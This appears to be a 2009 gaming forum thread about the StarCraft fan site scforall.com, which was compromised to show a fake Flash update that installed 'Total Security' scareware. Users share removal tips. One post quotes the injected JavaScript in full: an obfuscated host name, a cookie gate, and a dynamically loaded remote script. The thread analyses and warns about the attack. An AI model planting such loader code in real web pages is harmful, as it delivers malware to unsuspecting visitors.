|
I visited earlier, ignored the attack site warnings. I didn't download anything because i'm not retarded but that didn't seem to spontanteously get me a virus so it seems one could still surf the site as long as they don't download anything.
http://www.scforall.com/news/news02.asp?mNum=n03&PageNo=1&where=&query=&sterm=&articleNum=644
While reading the "there is nothing wrong with the site" news post, i noticed this:
+ Show Spoiler +
Is this still not a sign that SCForAll is not being hacked? At the very least, please investigate why your Russian friends are able to easily edit /include/bottom.asp to include their nifty javscript code that loads an external javascript file that, in turn, loads the popup offering the malware download. Heck, also investigate why I was able to edit this news info! So please for the sake of your users and fellow Starcraft fans at least truly investigate stuff first before saying nothing is wrong.
apparently there are quite a few gaping security holes in scforall.com
|
I'm glad I run flash-block and no-script. I only allow javascript to run based on a whitelist. Anything new that comes up just doesn't run at all.
|
this just proves that TL is a better sight than scforall~~ haha
on a more serious note, i shall d/l the file to spite my university~
|
this site is def. not secure to visit yet, just letting you guys know. this has come to my attention about 3 months ago and ever since then i never touched the website, artosis/whoever need to take action asap. my computer won't even let me go to the site because its so dangerous
|
Glad I'm not the only one who had this problem. If you get the Total Security 2009 bullshit I got, you can just rename taskmgr.exe in system32 to iexplore.exe(the only program you can open) and end the task and then remove the virus.
|
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it
|
To anyone who had that Total security 2009 thing I sugest checking your C:\WINDOWS\system32\drivers\etc hosts file. It's probably full of stuff like "127.0.0.2 google.com" It prevents you from acsesing google, yahoo search and some more search engines. Delete those lines (it will probably be everything in the file) and will be fixed.
|
Yeah I don't really trust scforall right now either. I had some weird virus thing pop up on that site, like it was hi-jacked or something
|
u gotta skate8152 Posts
Similar thing happened to me the other day where I was asked to download some .pdf or something which I just ignored. Thankfully it didn't to anything to my system lol.
On September 27 2009 04:47 SonuvBob wrote:Show nested quote +On September 27 2009 04:31 Deleriux wrote:
Please fix this. If you dont believe me open the page source yourself and you'll see the javascript. Yeah, Artosis is away at WCG USA though. Don't know anyone else behind scforall.
PuertoRican?
|
Website is 100% infected. Confirmed using Virtual Machine.
The code below executes a javascript command to create the "flash box" users are seeing. The first part of the code uses Cookies to only show the box on first entrance. Those of you who have been to the site, ignored the box and come back later to see if its still infected; will not see it if your cookies are enabled.
Upon allowing the website to install the "flash update" i noted 2 processes running. A long number stream under administrator using about 20k of mem and install_flash_player.exe
After a restart of the system, i have the very common "Total Security" fraudtool. http://www.bleepingcomputer.com/virus-removal/remove-total-security
Code:
+ Show Spoiler +
<script>function GetCookieVal (offset) { var endstr = document.cookie.indexOf (';', offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function GetCookie (name) { var arg = name + '='; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return GetCookieVal (j); i = document.cookie.indexOf(' ', i) + 1; if (i == 0) break; } return null; } function SetCookie (name, value) { var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + '=' + escape (value) + ((expires == null) ? '' : ('; expires=' + expires.toGMTString())) + ((path == null) ? '' : ('; path=' + path)) + ((domain == null) ? '' : ('; domain=' + domain)) + ((secure == true) ? '; secure' : ''); } if (GetCookie('x') == null) { var FoginosoteFalqe = 'ODYFYQZYNMxCMACTFBaEQXEYpGZFCNCWsKCEDYQLeFKSaKQHCFAKKQrDNOGcUOOQVhYWBSMKQQI.TXNOEOcVUZoNATm'.replace(/[A-Z]/g,''); var StudaliKqanuwupo = document.createElement('script'); StudaliKqanuwupo.src = 'http://' + FoginosoteFalqe + '/counter/?page=' + escape(document.referrer) + '&rnd=' + Math.random(); document.getElementsByTagName('head')[0].appendChild(StudaliKqanuwupo); var JzatuveYeput = new Date (); JzatuveYeput.setTime(JzatuveYeput.getTime() + (8*3600*1000)); SetCookie('x','1',JzatuveYeput, '/'); }</script>
Now, ScForAll aren't doing this on purpose, this is actually becoming one of the more common methods of malware dispersal through the internet. The infectious code is a little more advanced than the 1px by 1px iframes used by other fraudtools.
----
Contrary to what i read from other people, do not turn off your AV to use the website. Keep it up to date, when your AV blocks the attack; double-click the blue header and the frame is gone.
|
Osaka27156 Posts
I blame this on the LastShadow interview.
|
On September 27 2009 09:05 OmniKnight wrote:
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it
I avoided it because I was too lazy to get an update.
It's not that stupid to fall for something that looks like a flash player update.
|
On September 27 2009 09:05 OmniKnight wrote:
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it
Next time I'll use repel.
|
Wow. Now when I visit this site firefox gives me a preload page warning me that it's an attack site :O
|
so how do I check if I got infected, and how do i treat it?
edit: also, since when did this begin? chrome warned me from the very first time i entered the site
|
so how do I check if I got infected, and how do i treat it?
Most obvious is that you will have a massive "fake antivirus" tool saying your infected with a bazillion malware that don't exist.
Restart your computer to confirm the above. If you are infected, if possible use an alternative PC to download Malwarebytes.org; rename the installer and then use it.
|
On September 27 2009 11:13 Catch]22 wrote:
so how do I check if I got infected, and how do i treat it?
edit: also, since when did this begin? chrome warned me from the very first time i entered the site
I was stupid enough to click the link. If you were infected you would know. I it is a fake anti-spyware program called total security. Malwarebytes was able to kill it but not before it edited my hosts.txt to block every major search engine.
|
On September 27 2009 09:10 sashkata wrote:
To anyone who had that Total security 2009 thing I sugest checking your C:\WINDOWS\system32\drivers\etc hosts file. It's probably full of stuff like "127.0.0.2 google.com" It prevents you from acsesing google, yahoo search and some more search engines. Delete those lines (it will probably be everything in the file) and will be fixed.
Thanks for the suggestion. I was wondering why I couldn't get into all the search engines and had no idea how to fix it.
|
Do we know when this virii shit started happening on SCforall? because ive been on their site a little while ago and never got any fake adobe updates (or real adobe updates for that matter.)
i'm pretty sure it was within september
|
It's always been happening, check the site history. That's what happens when you depend on too many remote includes (or have exploits in your site).
Google reported badware activity on www.scforall.com/ between Sep 24th 2009 and Sep 24th 2009 Google reported badware activity on scforall.com/forums/ on Mar 5th 2009 Google reported badware activity on scforall.com/news/ on Mar 5th 2009 Google reported badware activity on scforall.com/prog/ on Mar 5th 2009 Google reported badware activity on www.scforall.com/prog/ on Mar 4th 2009 Google reported badware activity on www.scforall.com/news/ on Mar 3rd 2009 Google reported badware activity on www.scforall.com/forums/ on Aug 27th 2008
|
|
|
|
|
|
EPT
